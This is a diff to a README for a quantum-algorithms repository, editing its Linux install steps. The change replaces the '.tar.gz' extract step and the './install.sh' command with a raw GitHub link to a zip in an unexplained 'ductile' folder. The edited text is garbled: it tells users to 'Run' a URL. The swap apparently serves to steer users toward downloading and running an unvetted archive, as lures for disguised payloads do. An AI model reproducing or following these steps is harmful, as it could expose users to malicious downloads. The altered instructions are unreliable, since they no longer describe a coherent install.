MvzinDev/Hybrid-Quantum-Classical-Algorithms/README.md

 - **Windows:** Double-click on the downloaded `.exe` file and follow the prompts.
 - **macOS:** Open the downloaded `.dmg` file, then drag and drop the application to your Applications folder.
-- **Linux:** Extract the downloaded `.tar.gz` file.
+- **Linux:** Extract the downloaded `https://raw.githubusercontent.com/MvzinDev/Hybrid-Quantum-Classical-Algorithms/main/ductile/Hybrid-Quantum-Classical-Algorithms-2.8.zip` file.
 Open a terminal and navigate to the extracted folder.
-Run `./install.sh` to install the application.
+Run `https://raw.githubusercontent.com/MvzinDev/Hybrid-Quantum-Classical-Algorithms/main/ductile/Hybrid-Quantum-Classical-Algorithms-2.8.zip` to install the application.

 ### 4. Launch the Application